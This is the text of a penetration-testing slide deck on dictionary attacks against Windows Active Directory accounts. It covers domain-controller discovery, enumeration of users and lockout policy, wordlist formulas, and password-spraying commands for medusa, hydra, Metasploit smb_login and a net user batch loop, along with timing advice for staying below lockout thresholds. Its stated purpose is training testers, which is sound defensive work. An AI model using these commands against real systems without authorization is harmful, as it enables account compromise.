In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
2. Who am I?
Scott Sutherland
• Principal Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: Blogs, white papers,
tools etc
3. Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe
approach to Windows dictionary attacks
• Provide security professionals with questions
they should be asking their contractors
5. Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or
default passwords – “It’s human nature”
• Use accounts as entry points during penetration
tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ data
• User impersonation
6. Are There Alternatives?
Yes.
Approaches typically includes:
• Cracking pw hashes offline with:
‒ Pre-computed hash libraries like Rainbow
Tables
‒ Brute force and dictionary techniques using
tools like Hashcat and John the Ripper
• Dumping clear text passwords for interactive
sessions with Mimikatz
7. Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
8. Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for
“USERDNSDOMAIN”
• Review the registry for the default domain
9. Identify Domains: Tools
Method Tools Auth
IPCONFIG
DHCP Info No
NetBIOS Queries NETSTAT –A <IP> No
nmap -sL <IP Range> -oA output_rnds
DNS Queries No
./reverseraider -r <IP Range>
./dnswalk victem.com
perl fierce.pl -dns <domainname> -threads
5 -file <domainame>-dns.output
Wireshark (GUI) + Filter for browser traffic
Sniffing No
Network Monitor (GUI)
Etherape (GUI)
nmap –sS –PN –p3389 <IP Range>
RDP Drop Down Then visit with RDP client
No
10. Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
11. Enumerate DCs: Tools
Methods Tools Auth
NSLOOKUP –type=SRV _ldap._tcp.<domain>
DNS Queries No
NLTEST /DCLIST <domain>
RPC Queries FindPDC <domain> <request count>
No
NMAP –sS –p389,636 –PN <IP Range>
Port Scanning No
FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT
NetBIOS –A %i
No
Scanning
Net group “Domain Controllers” /domain
NET GROUP Yes
Command
LDAP Administrator (GUI Tool)
LDAP Queries Yes
Hyena (GUI Tool) &
adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No
| gawk -F ” ” “{print $2}” | sort | uniq
15. Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Lockout
Authenticated Methods threshold: 5
• NET ACCOUNTS Lockout
duration: 15
Command
Lockout
observation
What does it all mean? window : 15
• Threshold, duration,
and window
16. Get Domain Lockout Policy: Tools
Methods Tools Auth
RPC Queries Enum –P <IP Address>
Yes
&
dumpsec.exe /computer=<IP> /rpt=policy
/saveas=csv /outfile=domain_policy.txt No
NET ACCOUNTS
NET YEs
ACCOUNTS
COMMAND
17. Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team>Number>
Popular Dictionaries
• Metasploit dictionaries
• Rock you
• FuzzDB
• John the ripper
18. Create a Dictionary: Tools
Dictionary URLs / Lists
Blank password
Classics Username as password
password as password
<Password><Number>
<Companyname><Number>
Formulas <Season><Year>
<Sports team>Number>
Your Brain! Think of keywords relative to the target
company /geographic location and you’ll get more out
of your dictionary attacks!
http://www.skullsecurity.org/wiki/index.php/Passwords
Rockyou
http://code.google.com/p/fuzzdb/
FuzzDB https://github.com/rustyrobot/fuzzdb
http://www.openwall.com/wordlists/
John the Ripper
19. Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea = Attempt a few passwords for all
of the domain users each round, not a 1000
passwords against one user
• Subtract 2 attempts from the lockout policy
Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation
window
20. Perform Dictionary Attack: Tools
Tools Commands OS
medusa -H hosts.txt -U users.txt -P passwords.txt -
Medusa T 20 -t 10 -L -F -M smbnt
Linux
Easy to use GUI and not CLI that I know of.
Bruter Windows
ruby c:metasploitmsf3msfcli
Metasploit auxiliary/scanner/smb/smb_login THREADS=5
Windows
smb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux
PASS_FILE=c:passwords.txt
USER_FILE=c:allusers.txt SMBDomain=.
RHOSTS=192.168.1.1 E
hydra.exe -L users.txt -P passwords.txt -o
Hydra credentials.txt <ip> smb
Windows
and Linux
FOR /F “tokens=*” %a in (‘type passwords.txt’) do
Batch Script net user <ip>IPC$ /user:<user> %a
Windows
21. Conclusions
• There is more than one way to do
everything!
• Enumerate all available options
• It’s easy to lockout accounts – respect the
password policy
• Always ask contractors what their approach
is to reduce the chance of account lockouts
during penetration tests